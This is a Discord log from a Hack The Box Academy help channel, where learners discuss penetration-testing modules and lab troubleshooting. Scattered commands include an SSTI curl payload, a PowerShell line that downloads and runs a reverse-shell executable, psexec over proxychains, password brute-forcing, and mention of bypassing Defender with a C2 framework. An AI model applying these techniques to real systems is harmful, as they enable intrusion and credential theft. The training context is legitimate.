#modules

1 messages · Page 50 of 1

graceful rampart
#

I would not advise using ubuntu

red obsidianBOT
graceful rampart
#

You have to tear defender out of the machine if you're gonna build a windows attack VM

fathom pendant
#

^

quasi scarab
#

ok kali it is then cus i have some knowledge of kali

fathom pendant
#

Whichever you're comfortable with

#

The modules tend to focus on one or two tools and in-depth usage (nmap for example) and use cases (with a few examples)

#

Also if you buy any number of cubes, you get unlimited pwnbox usage instead of subscribing

quasi scarab
#

i would but i want to learn as i go u know

#

when i get the fundamentals down

#

then i might subscribe

fathom pendant
#

The fundamental courses are "free" as in they cost 10 cubes, but refund 10 on completion

#

So you could do all the fundamental modules (tier 0)

quasi scarab
opal jewel
#

Can I make a suggestion on enumerating pop3/imap with creds? Try evolution

north carbon
#

Anyone know how to hack passwords?

opal jewel
fathom pendant
storm jackal
#

Can someone help with Password Attacks - Hard? I have initial login, but can't crack the password manager. Should I look in a different direction?

storm jackal
shut ivy
#

anyone know the default ssh login credentials?

cinder mortar
#

for dns subdomain enumeration how would you know which wordlist to use given that there are so many?

dim wolf
true adder
#

Hi, I'm in the Tcpdump Packet Filtering section of Intro to Network Traffic Analysis (module 81 section 785) under the Looking for TCP Protocol Flags section. The material explains that the tcpdump filter tcp[13] & 2 != 0 will only display TCP packets with the SYN flag set by counting to the 13th byte and looking at the 2nd bit for a value of 1.

Looking at the TCP header diagram attached, I can see that we're in the 13th byte; however, the SYN flag appears to be in bit 14. How are we determining that bit 2 is for the SYN flag? The picture shows at the top, bits counting from 0 to 31 from left to right, yet if it were bit 2 of the 13th byte, would we be counting from right to left (little endian)?

Running that filter in tcpdump does, in fact, show SYN packets. I'm confused as to how we know it is bit 2.

quasi scarab
#

which do u guys recommend

#

for kali linux

flat oxide
#

Can you help me?

true adder
# quasi scarab which do u guys recommend

VMware Player is fine if you only want to run a single VM at a time. If you want to run multiple VMs simultaneously, choose Virtualbox. Besides that, there is little difference between the two for general usage.

quasi scarab
#

which would you recommend more for a beginner

#

i am going to be using 1 vm i think atm

#

im not sure why i would need more

true adder
#

Virtualbox. However, I've never used VMware player due to that single-running VM limitation.

#

Whichever you find easier to use, try both and choose 🙂

quasi scarab
#

i see for the long run i guess virtualbox will be better cus of no limitations so i might go with it as well

lunar skiff
#

Hey guys I’m new here. I just downloaded the parrot and VMware player to get started on my labs. When setting up the VMware wizard, will my guest operating system be Linux with a Debian 5 64 bit version?

rotund swallow
#

can I dm msg for a personal question

#

btw Im learning wireshark module

fresh reef
#

Currently on Attacking Common Services -Hard and When listing user through task mangr || PS it only shows that Fiona is connected...If this is the case how can i find my impersonation targets other than reading the names of the User's folders? I did and basically guessed the 2nd to last question beacuse that are only 3 choices(I was grasping at straws), I have the creds pulled from all of their files w/n the share (thus how i pwned fiona) but now im stuck on the last question @>@

dim wolf
#

also note that MSSQL accounts can be separate from the accounts on the host.

rustic sage
#

am experiencing a strange issue with Password Attacks Medium lab,cannot ssh,but can cme. Few days ago bruteforced mike and dennis,and downloaded Docs from smb. Cracked two passwords,got jason root. Since yesterday cannot ssh with none of them,either used id_rsa with mike ''sevens",although in my history and notes few days ago I could. Jumping from one question to another am confused,maybe I have to allow the remote access,but throught which user:k,s,d,w,j?Regenerated the VPN ,but nada

cinder mortar
#

for dns subdomain enumeration how would you know which wordlist to use given that there are so many?

feral stump
#

A “fierce” one

quasi scarab
#

yo can someone help im trying to install kali on oracle virtualbox and i get this error

light harbor
#

@cinder mortar - I think the general thinking is to use "big" list. Seclists has a few, I think there's a good jhaddix one in there. The obvious issue with the "effectiveness" of a wordlist is obviously connected to how many words are in the list. The longer the list, the longer the time.

That said, for CTFs a smaller "raft" list or some of the "dirb" and "dirbuster" lists have tended to be alright.

#

Has anyone done the file inclusion module? I finished it the other day and I was only able to a shell on 2 of the exercises.

I can get code execution on all of them, which is the point of the modules, but I'm unable to get any kind web shell. Additionally, whenever I try to wget from the machine, the machine resets. So I'm wondering getting a shell is a goal?

fresh reef
light harbor
#

@quasi scarab - what'd you do to fix it?

dim wolf
fresh reef
# dim wolf enumerate MSSQL.

My Latest failed command => sqlcmd -S SRVMSSQL\SQLEXPRESS -H WIN-HARD -U Fiona -P '4......!........' -y 30 -Y 30

quasi scarab
light harbor
#

@quasi scarab - ohhh! thanks! 😄

quasi scarab
fresh reef
dim wolf
#

i used mssqlclient so i'm not sure if there's an issue with your command

fresh reef
#

heard ill give that a shot

#

thanks

light harbor
#

@fresh reef - if it works, it might be worth to check what commands the metasploit module runs so we can just run those in the future - there's a lot of interesting msf voodoo

fresh reef
#

0.0 Heard

fresh reef
split orbit
#

What type of hashes is using things like ]\ \\

#

How can I identify the hash type

autumn pilot
median fog
fresh reef
#

?

autumn pilot
#

not needed, just click on the windows button of your RDP session and you will find it

fresh reef
#

I did a while back, and still could not log in

autumn pilot
#

is there an error message when you attempt to RDP into the target?

fresh reef
#

no Im logged on via RDP

#

however when attempting to utilize the studio its useless

autumn pilot
#

there is a setting that you must tweak

#

in order to be able to connect

fresh reef
#

With in the studio or mangr?

autumn pilot
#

studio

fresh reef
#

I have no clue what it could be, past switching the auth method...which renders the same errors

split orbit
#

I tried many website but did not identify this hash

median fog
fresh reef
#

What did you mean here? There is only one server 0.0

#

........i did nothing different...and now it works 0.0

#

Attacking Common Services Labs are sus

#

lol @autumn pilot & @dim wolf thankyou for the help...it was the instance

pine dagger
fresh reef
#

Huh? lol I dont doubt it, i just don't get it so the correct server is not WIN-HARD\SQLEXPRESS ?

tender marlin
#

yo are you only allowed to do one module a month on the silver program, because its not letting me buy another module and I dont see anything on the plan details.

median fog
vague lotus
#

Random question, but does anyone here know how to compile a python script to a Windows 64bit executable.....using pyinstaller....it yields a 16 bit exe which windows refuses to run

#

sudo pyinstaller --onefile -w get_external_ip.py
Yeilds the 16 bit exe....was hoping for a simple flag or something

iron basin
#

Anyone care to help or nudge on Attacking Common Services - hard lab?

vague lotus
#

nm probably this flag --target-architecture

fathom pendant
vague lotus
#

awesome thank you

tender marlin
rustic sage
#

Hello everyone

crisp remnant
#

Can anyone assist a bit with windows pe module ?

tiny yacht
#

Hey, can anyone explain to me why following command is not working smbclient -N -L \\IP\ and the smbclient -N -L ////IP// works ? Whats the reason of that ?

rustic sage
#

Slashes gotta be right way I think

tender marlin
tiny yacht
median fog
fathom pendant
#

You can use // instead

tiny yacht
tiny yacht
fathom pendant
#

But the case is \\\\Target\\

#

Are you on the vpn? Are you using the right IP?

tiny yacht
#

yes im on vpn, using right ip, all according to the instruction

rustic sage
#

someone has done this: ?

Introduction to Bash Scripting
Flow Control - Loops

Got the flag, but it doesnt work 😮 ?

tiny yacht
#

i know solution but i would like to know logic bch that

fathom pendant
rustic sage
#

no sir.

#

i can past it here, if its okay

fathom pendant
#

No

rustic sage
#

so ... ?

fathom pendant
#

Rego over the module and re evaluate your code and what the question is asking

bleak dome
#

anyone mind giving me a nudge on sqlmap essentials Bypassing Web Application Protections What's the contents of table flag10? (Case #10) keep getting the ('TypeError: Strings must be encoded before hashing')

warm sand
#

hi everyone, almost done with the file upload skills assessment - read the file where we can see where its being uploaded, got the correct extension to bypass all filters, what is the problem now that for any file that i upload i cannot find them..not sure what im doing wrong now, if anyone can give me a hint or some help that would be much appreciated. thank you!

vital adder
vital adder
warm sand
vital adder
#

@iron basin @crisp remnant sorry for the ping if you guys got help or got it already but shoot me a dm if you guys still need help with that

lethal atlas
#

I just found an unintended exploit on the skills assessment of Linux Priv Esc

vital adder
iron basin
#

@vital adder Thank you, I got help. If anyone needs help on the Attacking Common Services labs, let me know.

warm sand
vital adder
#

sure

lethal atlas
vital adder
#

yes and 2 more

lethal atlas
#

once I saw that I stopped looking lol

#

I was like BINGO root baby

vital adder
#

i think me and jarednexgent did have a little chat about that here 🤣

fathom pendant
#

Lol once you're in you don't need to care tbh and the fundamentals stuff I'm sure have multiple vulns

tight basin
#

Anyone else getting the error "There are no available instances. Please try again later." ?

lethal atlas
#

I have found that one on other platforms as well. I know I should go back and find the intended way but man if someone opens a door for you, you walk in.

ebon sapphire
#

Getting multiple people reporting "There are no available instances" , anybody else?

narrow jungle
#

Yep

#

been trying to load up one for the past 20mins

#

just getting the same error, no available instances.

timid moth
#

I am trying to work with an instance but it seems to come and go. Can't figure out of it's the VPN connection or the target

ebon sapphire
#

does HTB know?

golden island
#

For me "Target failed to spawn :(" 😭

narrow jungle
#

@high zinc are you guys aware of this issue?

#

or maybe @uneven forum , @tepid arrow, @languid fjord

languid fjord
#

Contact support on the platform pleas

narrow jungle
fathom pendant
#

Still send a message

#

It opens a ticket

narrow jungle
#

already have, just setting peoples expectations

ebon sapphire
#

hopefully they know the impact, about to have 30 students try to do a lab and it's not going to work

thorn urchin
#

sounds like plab B time

narrow jungle
#

Yeah, bedtime.

dim wolf
#

all the instances are too busy powering my AD experience

bleak dome
narrow jungle
#

Tip for new people that i've found helpful myself, if you see a command and want it breaking down you should use ChatGPT. (As a last resource if you can't figure it out using "man" or "-help" etc.)

#

for example

hearty gorge
#

Hi all. I'm trying to spawn a target instance to complete a module, but I keep getting a target failed to spawn error. I refresh the page as suggested, but it still doesn't work.

languid fjord
hearty gorge
ruby elbow
#

Hi everyone! how you doing? Could anyone drop a hint on the last question of: Skills Assessment Website assessment? Dunno if Am I bruteforcing it right or not

hazy grotto
#

Where are the real ones at?

scenic walrus
#

Is someone free to chat about XSS?

graceful rampart
fathom pendant
hazy grotto
graceful rampart
#

no lol. I mean sliver the C2

#

I've had an itch to do some evasion work for a while. Not doing it caused a great bit of burnout

#

so now im doing it

#

Defender has been bypassed lol

scenic walrus
#

yeah its regarding the "getting started" knowledge check part. I have been trying for three days to get a shell through a XSS vulnerability. I verified its a vulnerability by creating a popup and also I was able to download a file from a server I set up. HOwever, for the life of me I cant figure out how to get a shell. I found it in a text box that I can submit. I am completely stuck.

graceful rampart
#

XSS dosent usually lead to RCE

scenic walrus
#

oh shit.

graceful rampart
#

More often than not the best thing you can do with XSS is steal cookies from an admin

scenic walrus
#

i already have tge admin login. I guess then I want to have it upload a file into the server which would then create the shell. Okay. I guess I have to find something for that.

graceful rampart
#

Yea. Log in as the admin

#

try to look for a way to get a shell from there

fathom pendant
#

Getting started; nibbles section yeah?

scenic walrus
#

yeah, got through that now im on the get-simple cms

fathom pendant
#

Mmm

#

Yeah that one you may be able to use a type of framework tool to grab it

scenic walrus
#

i tried with metasploit, but it kept telling me that it couldnt authenticate.

thorn urchin
fathom pendant
graceful rampart
scenic walrus
#

yup

#

one sec ill take a screenshot

thorn urchin
#

yeah just something to be aware of

fathom pendant
#

Also as a fundamental module, they aren't expecting you to have the XSS knowledge to access it

scenic walrus
#

yeah thats what i figured but I got stuck and just started googling and found the xss

hazy grotto
fathom pendant
#

What are the options you have to set for metasploit?

scenic walrus
#

what is the "full uri path to GetSimplecms"

fathom pendant
#

If you do show options with that exploit

#

What is the section you're on?

scenic walrus
#

getting started: knowledge check

fathom pendant
#

Uri can be used synonymously with URL

scenic walrus
#

okay. I presumed that too but wanted to verify.

fathom pendant
#

There's a couple differences but they're neglible at this stage

scenic walrus
#

Exploit aborted due to failure: no-access: 10.129.224.54:80 - Authentication failed this is the error I get.

#

does that mean the port is wrong?

fathom pendant
#

What is the port you're accessing the webpage on?

scenic walrus
#

80

fathom pendant
#

Auth failed means that it failed to authenticate the user

#

Also remember: case sensitive

#

For user and pass

scenic walrus
#

alright so i have been changing my URI and something different happened: Exploit aborted due to failure: unknown: 10.129.224.54:80 - Upload failed
[*] Exploit completed, but no session was created.

fathom pendant
#

Run check to see if there's something that may be missing

#

Not at my computer ATM to double check things

scenic walrus
#

alright to 10.129.224.54:80/admin/ is the location of where I sign in as admin. is /admin/ the targeturi? check states: Cannot reliably check exploitability.

fathom pendant
#

Admin.php

#

Specifically

#

Check the difference between/admin/ and /admin.php

scenic walrus
#

i tried another exploit on metasploit and popped it.

#

Thanks for your help

dim wolf
#

i'm ||dumping the NTDS.dit|| in the AD skills assessment 1 but ||i'm doing it over proxychains|| so it's taking forever......

graceful rampart
#

I dont remember having to DCSync over proxychains 🤔

#

Oh no, never mind

#

My notes say otherwise

dim wolf
#

well the infra froze before the dump completed :)

#

attempt 2!

graceful rampart
#

Rip

#

Remember, if you just need a specific user you don't need to dump everything

wheat garden
graceful rampart
#

Empire is ok. Not my favorite tho

wheat garden
graceful rampart
#

C2?

#

Currently Sliver

wheat garden
#

thought powershell-empire be very suited for the AD skill asessment sliver got alot of ad stuff in it?

graceful rampart
#

Some. I haven't used it for a ton of AD. But I believe there are a bunch if extensions to load all the common AD tools directly into memory

dim wolf
#

that was a waste of time.

graceful rampart
#

Lmao. Why?

dim wolf
#

||all i needed was local admin hash||

graceful rampart
#

Rippp

glossy cipher
#

Hi, can someone help me for Skills assessment of pivoting, tunneling and port forwarding module?
i am at the last question i know the DC is 10.5 but pass the hash is not working
not sure what other thing i am missing

brisk geode
#

hey i cant connect to the ad module's windows foothold host it keeps showing a black screen and throws this error continously

proud pine
#

It always shows that error, no matter what.

brisk geode
pliant sage
#

hello, I'm having a bit of trouble with the file upload attacks - blacklist filters part

#

regardless of what extension I pick to upload my shell it doesn't execute, it just gets displayed on the page

proud pine
pliant sage
proud pine
#

There should be 2. If you look at all the screenshots in that module, you should see one with some payloads that you didn't check.

tidal kelp
#

needs som help. currenlty on the medium lab for footprints module. Have been able to access the UI for mssql but unable to connect via the console. it just times out.
Now i'm lost how to navigate in here to find the user?

glossy cipher
glossy cipher
# brisk geode can u elaborate more?

basically,
i have pivot all the way to 172.16.10.25
i know that the DC ip is 172.16.10.5
basically i am trying to gain access to 172.16.10.5
i was trying pass the hash but the hashes i gotten from mimikatz do not seem to work

#

like how do i gain access to the Domain controller
i think the issue i have is the password 😅

glossy cipher
#

ohh

#

let me try
my htb ran out so i need re do the pivot

glossy cipher
#

@brisk geode may I dm you?
i still cant get it

pliant sage
#

hi, any idea why this command fails to replace newlines with single quote space single quote in a text file? sed "s/\n/'\s'/g" payloads_all_the_things_php_ext

pliant sage
#

could use some help with the whitelist filters part of file upload attacks

pliant sage
#

nvm

timber hatch
#

the rdp connection in the modul active directory introduction in the guided labs are not stable. they disconect constantly. in case there is someone online who can forward this to a place where such problems are taken care of

#

nope, u can't do that lab. it closes so often. not possible.

iron canopy
#

Hi, I am completing the report writing module in order to pass the CPTS, however I am stuck on the Tmux shortcut question. I know the answer to the question but the formating [key] + [key] + [key] is not acting friendly with me.
Can somebody help please ?

dim light
#

hey guys
what course or document(or book) do you recommend for javascript security(for bug bounty hunting) and practical for hunt?

iron canopy
timber hatch
#

hello
SSTI Exploitation Example 1, i have the shell and tried grep -E 'HTB{.*}' $/usr/bin/env.
but no output, any hints?

timber hatch
#

also tried: curl -s http://<IP><Port>/env/$PATH | grep -e "HTB"

#

no output

tawdry wraith
#

not sure if its me or the service, but i'm attempting a module that wont let me nmap a spawned target

#

im using a pwnbox vm on my computer that is connected to the academy vpn

#

when i go to the link in firefox, it takes me to a generic word press page

vital adder
#

you only have access to the only port the target was given

vital adder
tawdry wraith
#

getting started public exploits

vital adder
#

you can only scan a target machine if that target is on a vm which will not give you any port only an ip

vital adder
tawdry wraith
#

correct

#

i was trying to do an nmap scan to get the service so i can look for an exploit

timber hatch
round ferry
#

Hello🏳️‍🌈

vital adder
timber hatch
#

jarden wrote once he solved it with curl....

vital adder
#

oh 🤣 must be an unintended path

timber hatch
#

i mean tried also with the tplmap.py - OS Shell

vital adder
#

i didn't noted down any about that tool for this first example

#

i do it manually

woeful ermine
#

hello everyone. I need help with shells and payload - the live engagement / host 2. I saw a mentioned exploit on the blog.inlanefreight.local and put it in exploits directory. use it in msfconsole and I am constantly getting error. 1st problem was the rhost, I put the ip of inlanefreight.local ip. And now it says Exploit failed: NoMethodError undefined method `split' for nil:NilClass . I also tried to use burp and change the file from there without success.

vital adder
vital adder
#

so you can try this command (this is what i got my in note)

grep -irl HTB{ /

and you can add 2>>/dev/null at the end if you are getting to many error also this grep command will start at / to it's going to take a good while

#

and you can try it in a couple of ||env path|| of course

timber hatch
#

i will try that. thanks!

woeful ermine
#

I ve tried every ip on ifconfig by the way hahaha

fathom pendant
#

Or at least the 172 ip

#

As the LHOST

#

Did you also specify the RHOSTS?

#

This exploit is really weird about it

woeful ermine
#

I put the inlanefreight.local ip

#

172.16.1.12

fathom pendant
#

The blog one?

woeful ermine
#

yep

#

I ping the blog and it gave me the inlanefreight.local ip

#

the weird thing is there is no lhost optiin

#

hahaha

fathom pendant
#

It should be

woeful ermine
#

there is rhosts and rhost

fathom pendant
#

If you're using the .rb exploit they're expecting you to

woeful ermine
#

I restart the msfconsole

dim wolf
#

the payload is a bind shell so there is no LHOST

fathom pendant
# woeful ermine

Ah now I remember; check your computer or something for login information

#

;)

woeful ermine
#

admin:admin123!@#

#

haha

#

they are given under hints

fathom pendant
#

But there is another way to get the login creds

woeful ermine
#

I literally copy paste it

rustic sage
#

I'm stuck at the File Upload Attack Web Assessment. I have to read the source code to find the upload directory. I can't find it. I however found the working upload.php attack file. How can I find the uploads director? I tried fuzzing, but no success.

vital adder
#

if you got the source code, read it

woeful ermine
rustic sage
rustic sage
#

i think i got the correct payload, but the response is just a base64 blob image

fathom pendant
dim wolf
#

why is it that when i get an error for ||downloading a file on SQL01 with a powershell command, the host can't connect back to my box to download another file and i have to restart the infrastructure|| on the AD attacks skill assessment 2?

vital adder
dim wolf
#

i'm not sure how to proceed

#

might just try the ||nishang powershelltcp script|| instead

narrow jungle
#

Hey, i'm currently working through the linux fundementals module, i'm on the service and process management section and i'm trying to find the answer for the page, the question is

"Use the "systemctl" command to list all units of services and submit the unit name with the description "Load AppArmor profiles managed internally by snapd" as the answer."

So i'm running

systemctl | grep load

But there are no results with that answer in the description, can someone point me in the right direction?

dim wolf
narrow jungle
#

i've tried other words too, snapd etc

#

ohhhhhh my god

#

what a clown

#

i just realised i closed the terminal, but didn't SSH back into the target

#

thank you

#

i'm going to have a short nap after this LOL

vital adder
dim wolf
#

i'm trying to do ||IEX|| rn

vital adder
#

just use wget 🤣

dim wolf
#

isn't wget just an alias though?

vital adder
#

not if you use it with powershell (so powershell wget)

dim wolf
#

powershell -c "wget ..." ?

vital adder
#

not sure about that i just use powershell wget (my ip / file) and an -o at the end to output the file

#

*with a name of course

dim wolf
#

well the command worked

#

but it's not downloading the file

#

it kinda just.. hangs

vital adder
#

and did you give it an output location?

dim wolf
#

there is no output

#

not even a NULL

vital adder
#

i mean in the command

dim wolf
#

yes i gave it an output location

vital adder
#

if is hanging try running the shell

#

but basically this is my command

(spoiler) powershell wget 172.16.7.240:8000/reverse.exe -o "C:\Windows\Temp\reverse.exe"
(spoiler) "C:\Windows\Temp\reverse.exe"```
pliant sage
#

could anybody give a small nudge on the file upload attacks skill assessment?

#

I'm trying to read the source code of the website but for that i need a directory name (ie /var/www/html/directory/yaddayaddayadda) and I can't really figure it out

#

or maybe I'm going the wrong direction?

dim wolf
#

thanks

bleak dome
#

anyone mind giving me another nudge on sqlmap essentials Bypassing Web Application Protections What's the contents of table flag10? (Case #10) figured out my problem i was having with the ('TypeError: Strings must be encoded before hashing') but now im stuck trying to retrieve the flag. I can dm my command for review.

pliant sage
#

sure you don't have a trailing space from copy pasting the flag?

#

dm me the flag you found

#

still could use a nudge for the file upload attacks skill assessment

#

I wasn't asking you in particular I'm asking the server in general

timid grove
#

is this a markdown typo ? XD shells and payloads > inflatrating windows

unique valve
vital adder
pliant sage
vital adder
#

i did linked a w3schools page (for the php code part) a while back but i don't have the link save for some reason

#

if you are having issue with php they should have something that you can play with

pliant sage
#

but i uploaded an image to give it a whirl and when i try to visit it using the naming convention I understood it doesn't seem to work, so I must have something wrong somewhere

graceful mortar
#

i'm stuck in the last part of buffer overflow linux, i can change te eip to x66666666 but i'm doing something wrong that i cannot get the reverse shell.
Someone could help me?

vital adder
vital adder
#

sure

narrow jungle
#

Having a lot of issues with the instances and targets on academy today, anyone else? trying to ssh to the target and just getting stuck with nothing, then refresh it and it says the ip isn't recognised etc

dim wolf
#

i had no trouble an hour ago but i'm in US

narrow jungle
#

it'

#

it's working again now, but yeah been having some issues all day just being a bit funky

#

so its happening again, suddenly it won't let me type in the terminal but i can scroll up and down, so i close the terminal try and ssh again but just get stuck here

#

have to terminate the session and start it again

#

annoying because i only get a couple hours a day to do this and both yesterday and today the instances been plagued with issues.

vital adder
# narrow jungle

if any other command worked fine and just the ssh command hang then the issue is on the target machine and because your ssh command can't connect it's just don't know that to do and hang

pliant sage
#

if anyone has any explanation as to why the .||png|| extension doesn't work for the file upload attacks skill assessment and can enlighten me I'd be very grateful

#

cuz considering the filters in place it should work

rustic sage
#

Could use some help. I'm stuck at Password Attacks - Pass the Ticket from Linux.

I'm unable to get the credentials of the user svc_workstations. I tried to crack his AES-256 hash with crackstation, rockyou, password.list, custom.rule, etc. I get absolutely nothing. What am I missing here?

autumn pilot
#

what mode are you using for cracking the password?

fathom pendant
#

^

obtuse leaf
#

hii'm new here

buoyant drum
#

@obtuse leaf Hi Welcome to HTB.

obtuse leaf
rustic sage
autumn pilot
#

does the hash that you have saved corresponds to that mode?

fiery skiff
#

hello

rustic sage
#

Yes. But it seems i need to extract the hashes from a different keyfile. Brb, gotta try a few more things.

fiery skiff
fathom pendant
rustic sage
autumn pilot
#

👍

silver sigil
#

Firewall and IDS/IPS Evasion - Hard Lab . I keep seeing the same 2 ports coming up with no other services. I have tried aggressive scanning and only get 2 options of services.

fathom pendant
silver sigil
fathom pendant
#

have you tried different scanning methods (-sS, -sT, -sU, -sA

silver sigil
fathom pendant
#

sec let me rerun this to see if there's something i'm forgetting

dusk owl
#

hello . does anyone know how to insert a function that deletes all the data available in an excel file after certain amouint of time

fathom pendant
simple zephyr
#

need some help with: Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux

**Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop. **

╰─ proxychains psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/administrator@ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -k -dc-ip 172.16.5.238                                                           ─╯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

Password:
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.5.238:88  ...  OK
[-] K||erberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)

Just let me know if I am on the right track. I ran an ||NMAP scan and know that 88 and 445|| is open so I am pretty sure psexec should work.

fathom pendant
#

"KDC_ERR_WRONG_REALM"

patent mulch
#

with python Write the function signature (def ...) for a function "foo" that has one argument "bar", including the trailing colon. My answer = def foo(bar:): .... can somebody tell what is wrong??

silver sigil
#

@fathom pendant I think I found my response after reading the instructions again

fathom pendant
#

it's not saying you're wrong it's just that where you're trying to go isn't in use

pine dagger
#

Yay! Finally got around to finishing Windows Privilege Escalation 😄

fathom pendant
fathom pendant
simple zephyr
fathom pendant
#

I'm just reading the error it's providing ¯_(ツ)_/¯

#

it says "reserved for future use" so idk

dim wolf
timber hatch
#

SERVER-SIDE ATTACKS , SSTI Exploitation Example 1, i don't get it....where is the flag? once when i have the shell with tplmap,
why does this commands nothing show: grep HTB $PATH or grep HTB $HOME

dim wolf
#

you might want to ask in another channel

timber hatch
#

curl -X POST -d 'name={{_self.env.registerUndefinedFilterCallback("HTB*{")}}{{_self.env.getFilter("id;uname -a;hostname")}}' IP:PORT

#

nothing

#

if somebody has the solution, just dm me please 😉

#

i would apreciate it

analog tendon
#

I could use some help on the DNS info gathering. im not sure which ip address the first question is asking for i found a few of different subdomains and there doesnt seem to be a www. subdomain

simple zephyr
fathom pendant
# dim light Any body don't know?

You can ask in #1024429874246590575 or verify your hackthebox account in #bot-commands and post your question in #web and someone may be able to answer. As this channel is for questions pertaining to the modules found on https://academy.hackthebox.com any non-academy related questions will generally be ignored here

worthy laurel
#

HTB Academy - File upload attacks - Skills Assessment - Totally stuck. Trying to read upload.php but I only see base64 encoded text of the image I uploaded.

analog tendon
#

ok update. the question asking for paydiant.com IP is not working at the moment. seems the site is down.

timber hatch
#

lol. once again 3 hours no progress. sometimes hack the box is just frustrating...

thorn urchin
#

if you have shell, my go to flag hunt out of frustration is grep -R HTB / 2>/dev/null

#

assuming the flag format is indeed HTB

#

if it isnt they usually give you the filename to look for

uncut mirage
#

Hi all,
I'm in the Password Attacks module, Password Mutations section. I have made a list using Hashcat using the password.list and custom.rules from the resources .zip file like this: ||hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list||. Then used ||crackmapexec ssh 10.129.235.57 -u sam -p mut_password.list to brute force the login.|| It has been running for more than 30 min now, indicating that i did something wrong. Can someone give me a hint please?

thorn urchin
#

That section legit can take 30-45 minutes to finish

#

also ssh is the slowest service to crack, youll be better off finding a faster one

uncut mirage
#

Whoa ok, will try FTP i guess. Thanks a lot!

mighty trellis
#

Hello can I have some help with windows fundamentals?

worthy laurel
mighty trellis
#

Im want to create a new user for windows fundamentals.

#

Ive only ever created users through start and havent done so in powershell in a long time.

#

Can some one help me.

fathom pendant
#
Net user add
#

I think

timber hatch
mighty trellis
#

Lets take this to my post.

timber hatch
#

lol, i wanna have my 3 hours back

thorn urchin
timber hatch
#

hack the box is good. but this part from hack the box is in my opinion just bad. what did i gain from my 3 hours, nothing than frsustration, i learned nothing... I mean i work the whole week and in the time i have, i want to learn something....

no sorry did not work..maybe i do soemthing wrong on another end...

balmy radish
thorn urchin
#

ah well there ya go

#

if they say the flag is an env var than searching the filesystem wont be useful

timid moth
#

you learn the most when you spend three hours making mistakes though

#

once you figure it out you probably won't mess up again

#

I like how vague HTB questions can be

thorn urchin
# timber hatch i did.

is this shell from a newly launched process? maybe it didnt inherit the environment properly. Try using your original injection to run the env command and check its output.

formal wyvern
#

Pretty random, but recently my instagram got hacked and they started promoting bitcoin etc in my name and posting stories and posts etc.
I was just wondering if anyone here knows somehow how to get back into that instagram account. Big ask, but if anyone can do this it will be much much appreciated.
Dm me

thorn urchin
#

this is for academy discussion

#

go away

formal wyvern
#

They don't have customer support/service sadly

autumn pilot
#

not our problem

#

keep the channel on topic

graceful mortar
#

i'm stuck in the last part of buffer overflow linux, i can change te eip to x66666666 but i'm doing something wrong that i cannot get the reverse shell.
Someone could help me?

balmy radish
#

I just did it and it works

timber hatch
balmy radish
turbid salmon
#

I'm stuck on the module WINDOWS PRIVILEGE ESCALATION. Especially on the section "Windows Privilege Escalation Skills Assessment - Part I".
I succeed to perform a privesc to get SYSTEM, but I can't find the answer to one of the question:

#

I tried to find files that contains 'ldapadmin', I tried to look for .sqlite files, I tried lazagne, snaffler. But nothing. Can someone help me?

dim wolf
#

i need some help with AD attacks skills assessment 2. i need a stable way to transfer files over to a host because every time i choose to use powershell to download files from my attack host to the sql server, the sql server has a random chance to just hang and i need to restart the infra. tried SMB shares which got blocked by the policy, and the host can't find my webdav server.

#

going to try living of the land next

waxen kayak
#

General question for folks going through the modules. Are you taking notes on, well, practically everything? I always feel a strong urge to write every example command down for example. I know tons of this stuff can just be googled, but not sure how I'd remember that, *oh I can use seatbelt for windows enumeration *

woeful ermine
#

well, for the commands part, even though, I havent started yet. I am going to create another notes just for commands divided by sections

#

I am thinking about taking the cpts that's why

#

I guess the answer is it is all about your goals

waxen kayak
#

Yep that is sort of what I am doing. I took one of the cheatsheet.md files provided and started adding onto it... actually created a private repo that I've also started putting things into that might be helpful to clone to another machine.

#

I figure this way. I can just clone it whenever I need it, has all my notes and useful scripts I might need.

woeful ermine
#

It is a lot easier to check your notes rather than google, especially when you know where to look. But, Sometimes it is the other way around. Some of my notes really messy

waxen kayak
#

100% agree... I think that might be what I struggle with most at this point... I think what I'm going to do is just try and have general categories and then applicable notes for those... once I complete the course and before the exam I will organize everything correctly so it's easier to navigate.

uncut mirage
rustic sage
waxen kayak
fathom pendant
#

You can cut the first 17k lines and should get it

fathom pendant
# waxen kayak 100% agree... I think that might be what I struggle with most at this point... I...

The cert doesn't make the #hacker, the skills do! 🦹
And what better way to polish your #pentesting skills than to pass the #CPTS exam?
Here are 4 useful tips to become a certified #pentester! Put them in action now: https://t.co/ayI3jyzbgo
#CyberSecurity #PenetrationTesting

rustic sage
uncut mirage
uncut mirage
fathom pendant
rustic sage
uncut mirage
fathom pendant
#

Also you can manipulate how many threads hydra can use

iron basin
#

Password Attacks - Network Services: I am trying to answer the last question. Medusa and hydra fail to work properly with smb, only option I have is msfconsole smb_login module. I run the module with appropriate options and use the password list provided. Before module can complete the box times out. Any help or nudge?

uncut mirage
fathom pendant
dim wolf
#

sql01, why must you do this to me....

uncut mirage
timber hatch
#

hah, SSTI Exploitation Example 2, I solved in 30 minutes. this is balm for my soul😂

foggy light
#

Regarding this question Can I inbox anyone ?
What is the FQDN of the host where the last octet ends with "x.x.x.203"?

#

Footprinting > DNS

foggy light
#

I solved it but I have some question

fathom pendant
#

just ask your question here

foggy light
#

I found the subdomain by accident.. It didnt showed up in my initial search

#

xxx.inlanefreight.htb

fathom pendant
#

So doing a dig any <ip> didn't show you anything?

dim wolf
#

anyone give me a nudge on AD attacks skills assessment 2? - Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

foggy light
#

I found the following

fathom pendant
#

How about a records

fathom pendant
#

Or zone transfer

old verge
#

Can I get some assistance with module: password attack lab - hard?

fathom pendant
foggy light
#

oh nvm

#

I found it

#

Thanks @fathom pendant

#

+rep

fathom pendant
#

